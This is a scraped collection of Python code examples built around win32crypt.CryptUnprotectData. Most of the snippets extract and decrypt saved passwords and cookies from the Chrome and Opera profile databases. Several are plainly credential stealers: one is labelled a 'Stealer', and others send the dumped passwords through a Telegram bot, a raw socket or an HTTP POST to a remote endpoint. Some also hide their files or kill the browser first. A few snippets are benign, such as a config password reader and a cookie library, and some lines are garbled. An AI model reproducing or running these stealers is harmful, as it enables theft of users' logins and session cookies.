Example #1
0
    def pluck_passwords(self):

        PATH = 'C:/Users/{}/AppData/Local/Google/Chrome/User Data/Default/Login Data'.format(
            os.getlogin())

        # Copies the chrome database over to the temporary directory.
        copy(PATH, gettempdir())

        # SQLite Connection
        conn = sqlite3.connect(gettempdir() + '//Login Data')
        cur = conn.cursor()

        user_data = None

        try:
            cur.execute(
                'SELECT action_url, username_value, password_value FROM logins'
            )
            user_data = cur.fetchall()
        except Exception:
            print('\nError fetching passwords.')

        for r in user_data:
            password = win32crypt.CryptUnprotectData(r[2], None, None, None,
                                                     0)[1]

            password = password.decode("utf-8")
            username = r[1]
            host = r[0]

            # Creates a string for each website / username / password combination
            result = '{0}\n\t{1}\n\t{2}\n\n'.format(host, username, password)

            # Adds each result to the payload, ready to be uploaded.
            self.payload += result
Example #2
0
def get_cookies(cookies_db_path, host_key, aes_gcm_key):
    """Get the cookies for the specified host_key from Chrome Cookies sqlite database."""
    cookies = []
    with tempfile.TemporaryDirectory(prefix="twitchget_") as temp_dir:
        # Copy the cookies database to avoid hitting a lock and open
        cookies_db_copy_path = shutil.copy(cookies_db_path, temp_dir)
        db = sqlite3.connect(cookies_db_copy_path)
        query = "SELECT name, path, expires_utc, is_secure, encrypted_value "\
                "FROM cookies WHERE host_key=?"
        cursor = db.cursor()
        cursor.execute(query, (host_key, ))
        for result in cursor.fetchall():
            name, path, expiry, secure, ev = result
            # Skip cookies that are blacklisted by name or session-only
            if name in COOKIES_BLACKLIST or expiry == 0:
                continue
            # Decrypt the cookie value
            if ev.startswith(b"v10"):
                nonce, cipertext = ev[3:15], ev[15:]
                aes_gcm = AESGCM(aes_gcm_key)
                dv = aes_gcm.decrypt(nonce, cipertext, None).decode("utf-8")
            else:
                dv = win32crypt.CryptUnprotectData(ev, None, None, None,
                                                   0)[1].decode("utf-8")
            cookies.append((name, path, expiry, secure, dv))
        # Close the database cleanly
        db.close()
    return cookies
def decrypt_password(password, key):
    iv = password[3:15]
    password = password[15:]

    cipher = AES.new(key, AES.MODE_GCM, iv)

    return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
Example #4
0
    def _decrypt(self, value, encrypted_value, key):
        """Decrypt encoded cookies
        """
        if (sys.platform == 'darwin') or sys.platform.startswith('linux'):
            if value or (encrypted_value[:3] != b'v10'):
                return value

            # Encrypted cookies should be prefixed with 'v10' according to the
            # Chromium code. Strip it off.
            encrypted_value = encrypted_value[3:]

            # Strip padding by taking off number indicated by padding
            # eg if last is '\x0e' then ord('\x0e') == 14, so take off 14.
            def clean(x):
                last = x[-1]
                if isinstance(last, int):
                    return x[:-last].decode('utf8')
                else:
                    return x[:-ord(last)].decode('utf8')

            iv = b' ' * 16
            cipher = AES.new(key, AES.MODE_CBC, IV=iv)
            decrypted = cipher.decrypt(encrypted_value)
            return clean(decrypted)
        else:
            # Must be win32 (on win32, all chrome cookies are encrypted)
            try:
                import win32crypt
            except ImportError:
                raise BrowserCookieError(
                    'win32crypt must be available to decrypt Chrome cookie on Windows'
                )
            return win32crypt.CryptUnprotectData(encrypted_value, None, None,
                                                 None, 0)[1].decode("utf-8")
Example #5
0
def get_chrome():
    #close the chrome browser
    os.system("taskkill /im chrome.exe /f")
    #Locate "Login Data" file where all passwords are saved
    data_path = os.path.expanduser(
        '~') + r'\AppData\Local\Google\Chrome\User Data\Default\Login Data'
    c = sqlite3.connect(data_path)
    cursor = c.cursor()
    #Select URL, UserName, Pwds from logins table
    select_stmt = "SELECT origin_url,username_value,password_value FROM logins"
    cursor.execute(select_stmt)
    login_data = cursor.fetchall()
    cursor.close()
    cred = {}
    pwds = {}
    #Decode saved passwords
    for url, user_name, pwd in login_data:
        pwd = win32crypt.CryptUnprotectData(pwd)
        cred[url] = (user_name, pwd[1].decode('utf8'))
    #Save it to text file "pwds.txt"
    with open('passwords.txt', 'a') as f:
        for i, j in cred.items():
            if j[1] != '' and j[0] != '':
                i1 = i.split('/')
                pwds[i1[2]] = (j[0], j[1])
        #sort according to URL in assending
        for j in sorted(pwds):
            f.write("{0:<35}{1:<35}{2:<15}\n".format(j, pwds[j][0],
                                                     pwds[j][1]))
Example #6
0
def get_chrome():
    data_path = os.path.expanduser(
        '~') + r'\AppData\Local\Google\Chrome\User Data\Default\Login Data'
    x = open(data_path, 'rb')
    z = x.read()
    x.close()
    f = open('logininfo', 'wb')
    f.write(z)
    f.close()

    c = sqlite3.connect('logininfo')
    cursor = c.cursor()
    select_statement = 'SELECT origin_url, username_value, password_value FROM logins'
    cursor.execute(select_statement)

    login_data = cursor.fetchall()
    cred = {}

    string = ''

    for url, user_name, pwd in login_data:
        pwd = win32crypt.CryptUnprotectData(pwd)
        cred[url] = user_name, pwd[1].decode('utf8')
        string += '\n[+] URL: %s \n USERNAME:%s \n PASSWORD:%s\n' % (
            url, user_name, pwd[1].decode('utf8'))
        print(string)
        a = open('loginids.txt', 'a')
        a.write(string)
        a.close()
Example #7
0
def getChromePasswords():
    info_list = []
    path = getPath()

    try:
        connection = sqlite3.connect(path + 'Login Data')
        with connection:
            cursor = connection.cursor()
            v = cursor.execute(
                'SELECT action_url, username_value, password_value FROM logins'
            )
            value = v.fetchall()

        for website_url, username, password in value:
            if os.name == 'nt':
                password = win32crypt.CryptUnprotectData(
                    password, None, None, None, 0)[1]

            if password:
                info_list.append({
                    'website_url': website_url,
                    'username': username,
                    'password': str(password)
                })

        return info_list
    except Exception as e:
        return [{
            "error": str(e)
        }, {
            "Problem":
            "User doesn't use Google Chrome or isn't using Windows"
        }]
Example #8
0
    def getCookieTotxt(host, filename):
        #1.第一步从本地浏览器COOKIES数据库读取数据
        cookiepath = os.environ[
            'LOCALAPPDATA'] + r"\Google\Chrome\User Data\Default\Cookies"
        sql = "select name,encrypted_value from cookies where host_key like '%s'" % host
        cookie_list = []
        split_str = "; "
        with sqlite3.connect(cookiepath) as conn:
            cu = conn.cursor()
            for name, encrypted_value in cu.execute(sql).fetchall():
                cookie_list.append(
                    name + "=" +
                    win32crypt.CryptUnprotectData(encrypted_value)[1].decode())
            str_cookies = split_str.join(cookie_list)
        print(str_cookies)
        with open(filename, 'w') as f:
            print(str_cookies, file=f)


#运行环境windows 2012 server python3.4 x64 chrome 50
#以下是测试代码
#Getcookies.getcookiefromchrome('www.fjetc.com','etc_cookie.txt')
#Getcookies.saveCookieTotxt('%pss.txffp.com','cookies.txt')
#Getcookies.getCookieTotxt('%pss.txffp.com','cookies.txt')

#设置allow_redirects为真
#r=requests.get(url,headers=httphead,cookies=getcookiefromchrome('pss.txffp.com'),allow_redirects=1)
#print(r.text)
Example #9
0
def decrypt(path, save_path):
        if not os.path.isfile(path):
                print 'The file doesn\'t exist!'
                return

        connChrome = sqlite3.connect(path)
        cursor = connChrome.cursor()
        try:
                cursor.execute('SELECT action_url, username_value, password_value FROM logins')
        except:
                print 'Impossible to read ' + path
                return

        print '\t\t\t*** Passwords ***'

        for query in cursor.fetchall():
                passwd = win32crypt.CryptUnprotectData(query[2], None, None, None, 0)[1]
                if passwd:
                        print 'URL: ' + query[0]
                        print 'User: '******'Password: '******'--------------------'

                        if save_path != '':
                                passwordsFile = open(save_path, 'a')
                                passwordsFile.writelines('URL: ' + query[0] + '\nUser: '******'\nPassword: '******'\n--------------------\n')
                                passwordsFile.close()
Example #10
0
def dumpPass():
    # LOCALAPPDATA is a Windows Environment Variable which points to >>> C:\Users\{username}\AppData\Local
    path = getenv(
        "LOCALAPPDATA") + "\Google\Chrome\User Data\Default\Login Data"
    path2 = getenv("LOCALAPPDATA") + "\Google\Chrome\User Data\Default\Login2"
    copyfile(path, path2)

    conn = sqlite3.connect(path2)  # Connect to the copied Database

    cursor = conn.cursor(
    )  # Create a Cursor object and call its execute() method to perform SQL commands like SELECT
    # SELECT column_name,column_name FROM table_name
    # SELECT action_url and username_value and password_value FROM table logins
    cursor.execute(
        'SELECT action_url, username_value, password_value FROM logins')

    User_Pass = list()
    # To retrieve data after executing a SELECT statement, we call fetchall() to get a list of the matching rows.
    for raw in cursor.fetchall():
        # print raw[0] + '\n' + raw[1]  # print the action_url (raw[0]) and print the username_value (raw[1])
        password = win32crypt.CryptUnprotectData(
            raw[2]
        )[1]  # pass the encrypted Password to CryptUnprotectData API function to decrypt it
        # print password  # print the password in clear text
        User_Pass.append(raw[0] + ' ' + raw[1] + ' ' + password)
    conn.close()
    return User_Pass
Example #11
0
def getSaveChromePW():

	#path to user's login data
	data_path = os.path.expanduser('~')+"\AppData\Local\Google\Chrome\User Data\Default"
	login_db = os.path.join(data_path, 'Login Data')
	#db connect and query
	c = sqlite3.connect(login_db)
	cursor = c.cursor()
	select_statement = "SELECT origin_url, username_value, password_value FROM logins"
	cursor.execute(select_statement)
	login_data = cursor.fetchall()
	#URL: credentials dictionary
	credential = {}
	#decrytping the password
	for url, user_name, pwd, in login_data:
		pwd = win32crypt.CryptUnprotectData(pwd, None, None, None, 0) #This returns a tuple description and the password
		credential[url] = (user_name, pwd[1])
	#writing to a text file (CAUTION: Don't leave this text file around!)
	prompt = 'y'
	if prompt == 'y':
		with open('pwd.txt', 'w') as f:
			for url, credentials in credential.iteritems():
				if credentials[1]:
					f.write("\n"+url+"\n"+credentials[0].encode('utf-8')+ " | "+credentials[1]+"\n")
				else:
					f.write("\n"+url+"\n"+"USERNAME NOT FOUND | PASSWORD NOT FOUND \n")
		print "[.] Successfully written to pwd.txt!"
	else:
		quit()
    def start(self):
        #Retriving Password Hash From Database File
        c = sqlite3.connect(self.login_db)
        cursor = c.cursor()
        select_statement = "SELECT origin_url, username_value, password_value FROM logins"
        cursor.execute(select_statement)
        login_data = cursor.fetchall()

        credentials_dict = {}

        #Decrypting password
        for url, user_name, pwd, in login_data:
            pwd = win32crypt.CryptUnprotectData(pwd, None, None, None,
                                                0)  #Tuple
            credentials_dict[url] = (user_name, pwd[1])

        #Iterating Each Creds and Storing it in "self.result"
        for url, credentials in six.iteritems(credentials_dict):
            if credentials[1]:
                self.result += "\n\nURL      : " + url
                self.result += "\nUsername : "******"\nPassword : "******"\n\nURL      : " + url
                self.result += "\nUsername : NOT FOUND"
                self.result += "\nPassword : NOT FOUND"

        return self.result
Example #13
0
def chrome():
    textc = "\n    CHROME COOKIES  "
    try:
        if os.path.exists(
                os.getenv("LOCALAPPDATA") +
                '\\Google\\Chrome\\User Data\\Default\\Cookies'):
            shutil.copy2(
                os.getenv("LOCALAPPDATA") +
                '\\Google\\Chrome\\User Data\\Default\\Cookies',
                os.getenv("LOCALAPPDATA") +
                '\\Google\\Chrome\\User Data\\Default\\Cookies2')
        conn = sqlite3.connect(
            os.getenv("LOCALAPPDATA") +
            '\\Google\\Chrome\\User Data\\Default\\Cookies2')
        cursor = conn.cursor()
        cursor.execute('SELECT encrypted_value,host_key,name FROM Cookies;')

        for result in cursor.fetchall():
            cookies = win32crypt.CryptUnprotectData(result[0], None, None,
                                                    None, 0)[1]
            if cookies:
                textc = textc + "\n" + "url: " + result[
                    1] + "  |  name: " + result[
                        2] + "  |  data: " + cookies.decode("utf-8")
    except:
        return "no chrome"


#print(textc)
    return (textc)
Example #14
0
def opera():
    texto = "\n    OPERA COOKIES   "
    try:
        if os.path.exists(
                os.getenv("APPDATA") +
                '\\Opera Software\\Opera Stable\\Cookies'):
            shutil.copy2(
                os.getenv("APPDATA") +
                '\\Opera Software\\Opera Stable\\Cookies',
                os.getenv("APPDATA") +
                '\\Opera Software\\Opera Stable\\Cookies2')
        conn = sqlite3.connect(
            os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Cookies2')
        cursor = conn.cursor()
        cursor.execute('SELECT encrypted_value,host_key,name FROM Cookies;')

        for result in cursor.fetchall():
            cookies = win32crypt.CryptUnprotectData(result[0], None, None,
                                                    None, 0)[1]
            if cookies:
                texto = texto + "\n" + "url: " + result[
                    1] + "  |  name: " + result[
                        2] + "  |  data: " + cookies.decode("utf-8")
    except:
        return "no opera"
    #print(texto)
    return (texto)
Example #15
0
 def get(self):
     if self.caller.ignore_policy != "1":
         policy_value = self.get_from_policy(log=False)
         if policy_value != None:
             logger.debug("Reading %s from group policy settings" % self.name)
             return policy_value
     ini_value = self.get_from_ini(log=False)
     if ini_value != None:
         ini_value = re.sub(r'^"|"$', '', ini_value)   # remove possible quotes
         logger.debug("Reading %s from ini file" % self.name)
         self.passwordtype = ini_value.split(":")[0]
         value = ":".join(ini_value.split(":")[1:])
         if self.passwordtype == "clear":
             # Encrypt the password
             self.set(value)
             return value
         elif self.passwordtype == "crypt":
             #Remove base_64
             if value[-1] == "#": # If an extra # has been added to the hash to force quoting
                 encrypted_password = base64.b64decode(value[:-1]) # Remove hash at end
             else:
                 encrypted_password = base64.b64decode(value)
             password = win32crypt.CryptUnprotectData(encrypted_password, None, None, None, 0)[1]
             return password
         else:
             raise WpkgConfigError("The password type %s is invalid, provide either 'clear:password' or 'crypt:encryptedpassword'" % self.passwordtype)
     else:
         return None
Example #16
0
    def LDParser(self):

        conn = sqlite3.connect(
            os.getenv("APPDATA") +
            "\..\Local\Google\Chrome\User Data\Default\Login Data")
        cursor = conn.cursor()
        cursor.execute(
            'SELECT action_url, username_value, password_value FROM logins')
        output_file_path = 'ChromeCode/ChromeLoginData'
        with open(output_file_path, 'wb') as output_file:
            csv_writer = csv.writer(output_file, quoting=csv.QUOTE_ALL)
            headers = []
            csv_writer.writerow(headers)
            for result in cursor.fetchall():
                password = win32crypt.CryptUnprotectData(
                    result[2], None, None, None, 0)[1]
                if password:
                    print 'Site: ' + result[0]
                    print 'Username: '******'Password: '******'Site', result[0]) + ("\n"
                                                     'Username', result[1]) +
                              ("\n"
                               'Password', password))
                csv_writer.writerow(Final_list)
Example #17
0
def getcachedpass():
    # Close all chrome tabs
    os.system("taskkill /F /IM chrome.exe")

    # Connect to sqlite database
    conn = sqlite3.connect(path)
    cursor = conn.cursor()

    # Read login data from cache
    cursor.execute(
        'Select action_url, username_value, password_value FROM logins')
    urls = []
    usrs = []
    pwds = []

    for result in cursor.fetchall():
        password = str(
            win32crypt.CryptUnprotectData(result[2], None, None, None,
                                          0)[1])[2:-1]

        if password != "" and result[1] != "":
            urls.append(result[0])
            usrs.append(result[1])
            pwds.append(password)

    return (urls, usrs, pwds)
Example #18
0
    def _getchromekey(self, browser):
        # Newer versions of Chrome generate a key to encrypt the user passwords with.
        # Chrome encrypts THAT password on Windows using the Windows DPAPI and then
        # base64 encodes it to store in the browser state file.
        chromekey = None
        try:
            state = browser["state"]
            encrypted_key = state["os_crypt"]["encrypted_key"]
            encrypted_key = base64.b64decode(encrypted_key)

            if encrypted_key.startswith(ChromiumScanner.CHROME_DPAPI_PREFIX): 
                # Decrypt the key using Windows encryption
                # This will not work if the user's password was changed by an
                # administrator. 
                chromekey = win32crypt.CryptUnprotectData(encrypted_key[len(ChromiumScanner.CHROME_DPAPI_PREFIX):])[1]
            else:
                chromekey = encrypted_key

            # Just in case we might want this key later.. lets save it.
            # Only time wecan get it is now if it was encrypted with DPAPI
            binfile = os.path.join(browser["staging_dir"], "chromekey.bin")
            with open(binfile, "wb") as f:
                f.write(chromekey)

        except:
            print(" [*] Chromium encryption key not found or not usable; maybe older version")

        browser["chromekey"] = chromekey
        return chromekey
Example #19
0
 def __key_extract(self) -> bytes:
     """Extracts AES key for the new crypto method introduced in Google Chrome V80."""
     with open(os.path.join(self.base_dir + 'Local State'), 'rb') as key_file_raw:
         key_file_json = json.loads(key_file_raw.read())
     key_base64 = key_file_json["os_crypt"]["encrypted_key"]
     key_protected = base64.b64decode(key_base64)[5:]  # [5:] removes header
     return win32crypt.CryptUnprotectData(key_protected, None, None, None, 0)[1]  # Removing Windows' key protection
Example #20
0
def main():
    path = getenv(
        'APPDATA'
    ) + '\..\Local\Google\Chrome\User Data\Default\Login Data'  #change as required
    if not os.path.isfile(path):
        print '[!] Login Data file not found!\n'
        quit()

    print '[!] Connecting to %s' % path
    # Connect to the database file
    try:
        con = sqlite3.connect(path)
        print '[!] Connected.  Decrypting passwords...\n'

    except Exception as e:
        print e

    # Get the data
    curs = con.cursor()
    curs.execute(
        'SELECT action_url, username_value, password_value FROM logins')
    for result in curs.fetchall():  # Decrypt the Password
        site_name = result[0]
        user_id = result[1]
        password = win32crypt.CryptUnprotectData(result[2], None, None, None,
                                                 0)[1]
        if password:
            print 'Site: ' + site_name
            print 'Username: '******'Password: '******'\n'

    print '[!] Done!\n'
def psw(m):
    bot.send_message(admin, 'wait')
    #path to user's login data
    data_path = os.path.expanduser('~')+"\AppData\Local\Google\Chrome\User Data\Default"
    login_db = os.path.join(data_path, 'Login Data')
    #db connect and query
    c = sqlite3.connect(login_db)
    cursor = c.cursor()
    select_statement = "SELECT origin_url, username_value, password_value FROM logins"
    cursor.execute(select_statement)
    login_data = cursor.fetchall()
    #URL: credentials dictionary
    credential = {}

    #decrytping the password
    for url, user_name, pwd, in login_data:
	pwd = win32crypt.CryptUnprotectData(pwd, None, None, None, 0)
	credential[url] = (user_name, pwd[1])
    with open('pwd.txt', 'w') as f:
	for url, credentials in credential.iteritems():
	    if credentials[1]:
                
	         f.write("\n"+url+"\n"+credentials[0].encode('utf-8')+ " | "+credentials[1]+"\n")
	    else:
	         f.write("\n"+url+"\n"+"USERNAME NOT FOUND | PASSWORD NOT FOUND \n")
    psw = open('pwd.txt', 'rb')
    bot.send_document(admin, psw)
Example #22
0
def get_saved_password(name):
    r"""Retrieve previously saved password. The password is returned 
        unencrypted.  *name* is used to lookup a password on this machine,
        which must be the same *name* used in :py:func:`.save_password`."""

    try:
        # Only import pywin32 dependency if user creates a project
        # that requires encrypted password.
        import win32crypt
    except ImportError:
        raise DistutilsModuleError("system missing required win32api "
                "module. You can download from "
                "http://sourceforge.net/projects.pywin32")

    try:
        # retrieve value from user's private registry

        with _winreg.OpenKeyEx(_winreg.HKEY_CURRENT_USER,
                "SOFTWARE\\signet") as key:

            enc = _winreg.QueryValue(key, name)
            enc =  base64.b64decode(enc)

            # decrypt password using DPAPI (CRYPTPROECT_LOCAL_MACHINE)

            return win32crypt.CryptUnprotectData(enc, 
                            None, None, None, 4)[1]

    except (WindowsError, IndexError):
        return None
Example #23
0
def Opera_cockie():
    textoc = 'coded by romarakhlin\n\n\nCookies Opera:' + '\n'
    textoc += 'URL | COOKIE | COOKIE NAME' + '\n'
    if os.path.exists(
            os.getenv("LOCALAPPDATA") +
            '\\Google\\Chrome\\User Data\\Default\\Cookies'):
        shutil.copy2(
            os.getenv("LOCALAPPDATA") +
            '\\Google\\Chrome\\User Data\\Default\\Cookies',
            os.getenv("LOCALAPPDATA") +
            '\\Google\\Chrome\\User Data\\Default\\Cookies2')
        conn = sqlite3.connect(
            os.getenv("LOCALAPPDATA") +
            '\\Google\\Chrome\\User Data\\Default\\Cookies2')
        cursor = conn.cursor()
        cursor.execute("SELECT * from cookies")
        for result in cursor.fetchall():
            cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
            name = result[2]
            url = result[1]
            textoc += url + ' | ' + str(cookie) + ' | ' + name + '\n'
    return textoc

    file = open(os.getenv("APPDATA") + '\\opera_cookies.txt', "w+")
    file.write(str(Opera_c()) + '\n')
    file.close()
Example #24
0
    def _decrypt(self, value, encrypted_value):
        """Decrypt encoded cookies
        """
        # decryption different for windows. Use windows unprotect data
        if sys.platform == 'win32':
            try:
                decrypted = win32crypt.CryptUnprotectData(
                    encrypted_value, None, None, None, 0)[1]
            except:
                decrypted = "<encrypted>"
            return decrypted

        else:
            if value or (encrypted_value[:3] != b'v10'):
                return value
            # Encrypted cookies should be prefixed with 'v10' according to the
            # Chromium code. Strip it off.
            encrypted_value = encrypted_value[3:]

            # Strip padding by taking off number indicated by padding
            # eg if last is '\x0e' then ord('\x0e') == 14, so take off 14.
            # You'll need to change this function to use ord() for python2.

            def clean(x):
                return x[:-ord(x[-1])].decode('utf8')

            iv = b' ' * 16
            cipher = AES.new(self.key, AES.MODE_CBC, IV=iv)
            decrypted = cipher.decrypt(encrypted_value)
            return clean(decrypted)
Example #25
0
    def decipher_new_version(self, path):
        database_path = path + os.sep + 'Login Data'
        if os.path.exists(database_path):

            # Connect to the Database
            conn = sqlite3.connect(database_path)
            cursor = conn.cursor()

            # Get the results
            try:
                cursor.execute(
                    'SELECT action_url, username_value, password_value FROM logins'
                )
            except Exception, e:
                print_debug('DEBUG', '{0}'.format(e))
                print_debug(
                    'ERROR',
                    'Opera seems to be used, the database is locked. Kill the process and try again !'
                )
                return

            pwdFound = []
            for result in cursor.fetchall():
                values = {}

                # Decrypt the Password
                password = win32crypt.CryptUnprotectData(
                    result[2], None, None, None, 0)[1]
                if password:
                    values['URL'] = result[0]
                    values['Login'] = result[1]
                    values['Password'] = password
                    pwdFound.append(values)

            return pwdFound
Example #26
0
def get_passwd(path=None):
    if path == None:
        data_path = os.path.expanduser(
            '~') + "\\AppData\\Local\\Google\\Chrome\\User Data\\Default"
        files = os.listdir(data_path)
        passwd_path = os.path.join(data_path, 'Login Data')
    else:
        passwd_path = path

    # fetch data
    statement = 'select username_value, password_value, origin_url from logins;'
    datas = get_data(passwd_path, statement)
    print("Username|Password|Site")
    for data in datas:
        name = data[0]
        site = data[2]
        password_hash = data[1]
        try:
            password = win32crypt.CryptUnprotectData(password_hash, None, None,
                                                     None, 0)
            password = password[1].decode("gbk")
        except:
            print('[*]One hash failed -- try next> Site: {} User: {}'.format(
                site, name))
            password = ""
        print("{}|{}|{}".format(name, password, site))
Example #27
0
def chrpass():  # legal purposes only!
    strPath = APPDATA + "/../Local/Google/Chrome/User Data/Default/Login Data"

    if not os.path.isfile(APPDATA + "/../Local/Google/Chrome/User Data/Default/Login Data"):
        objSocket.send(str.encode("noexist"))
        return

    conn = sqlite3.connect(strPath)  # connect to database
    objCursor = conn.cursor()

    try:
        objCursor.execute("Select action_url, username_value, password_value FROM logins")  # look for credentials
    except:  # if the chrome is open
        objSocket.send(str.encode("error"))
        strServerResponse = decode_utf8(objSocket.recv(1024))

        if strServerResponse == "close":  # if the user wants to close the browser
            subprocess.Popen(["taskkill", "/f", "/im", "chrome.exe"], shell=True)
        return

    strResults = "Chrome Saved Passwords:" + "\n"

    for result in objCursor.fetchall():  # get data as raw text from sql db
        password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
        if password:
            strResults += "Site: " + result[0] + "\n" + "Username: "******"\n" + "Password: " \
                          + decode_utf8(password)

    strBuffer = str(len(strResults))
    objSocket.send(str.encode(strBuffer))  # send buffer
    time.sleep(0.2)
    objSocket.send(str.encode(strResults))
def Chrome():
    text = 'Stealer coded by Dark $ide\n\n\nPasswords Chrome:' + '\n'
    text += 'URL | LOGIN | PASSWORD' + '\n'
    if os.path.exists(
            os.getenv("LOCALAPPDATA") +
            '\\Google\\Chrome\\User Data\\Default\\Login Data'):
        shutil.copy2(
            os.getenv("LOCALAPPDATA") +
            '\\Google\\Chrome\\User Data\\Default\\Login Data',
            os.getenv("LOCALAPPDATA") +
            '\\Google\\Chrome\\User Data\\Default\\Login Data2')

        conn = sqlite3.connect(
            os.getenv("LOCALAPPDATA") +
            '\\Google\\Chrome\\User Data\\Default\\Login Data2')
        cursor = conn.cursor()
        cursor.execute(
            'SELECT action_url, username_value, password_value FROM logins')
        for result in cursor.fetchall():
            password = win32crypt.CryptUnprotectData(result[2])[1].decode()
            login = result[1]
            url = result[0]
            if password != '':
                text += url + ' | ' + login + ' | ' + password + '\n'
    return text
def steal_passwords():
    path = get_path()
    try:
        connection = sqlite3.connect(path + "Login Data")
        with connection:
            cursor = connection.cursor()
            v = cursor.execute(
                'SELECT action_url, username_value, password_value FROM logins'
            )
            value = v.fetchall()

        for information in value:
            password = win32crypt.CryptUnprotectData(information[2], None,
                                                     None, None, 0)[1]
            if password:
                params = json.dumps({
                    'origin_url': information[0],
                    'username': information[1],
                    'password': str(password)
                }).encode('utf8')
                credentials = base64.b64encode(b'user:pass')

                req = request.Request("http://www.example.com/restpoint",
                                      data=params,
                                      headers={
                                          'content-type': 'application/json',
                                          'Authorization':
                                          'Basic %s' % credentials
                                      })
                request.urlopen(req)

    except sqlite3.OperationalError as e:
        sys.exit(0)
def stage_1():
    #Extract the database of chrome passwords from the route
    shutil.copy(
        getenv("APPDATA") +
        r"\..\Local\Google\Chrome\User Data\Default\Login Data",
        'LoginData.db')
    #Hide the copied database from user eyes
    subprocess.check_call(["attrib", "+H", "LoginData.db"])
    #Waits for database to be copied
    time.sleep(2)
    conn = sqlite3.connect("LoginData.db")
    filename = "stage1.txt"
    cursor = conn.cursor()
    myfile = open(filename, 'w')
    subprocess.check_call(["attrib", "+H", filename])
    cursor.execute(
        'SELECT action_url, username_value, password_value FROM logins')
    #Decrypts database
    for result in cursor.fetchall():
        try:
            password = win32crypt.CryptUnprotectData(result[2], None, None,
                                                     None, 0)[1]
            url = result[0]
            username = result[1]
            if password:
                myfile.write("{: <70}".format(url) +
                             "{: <70}".format(username) +
                             "{: <70}".format(password.decode('utf-8')) + "\n")
        except:
            pass

    myfile.close()
    conn.close()
    os.remove('LoginData.db')  #Remove the copyed database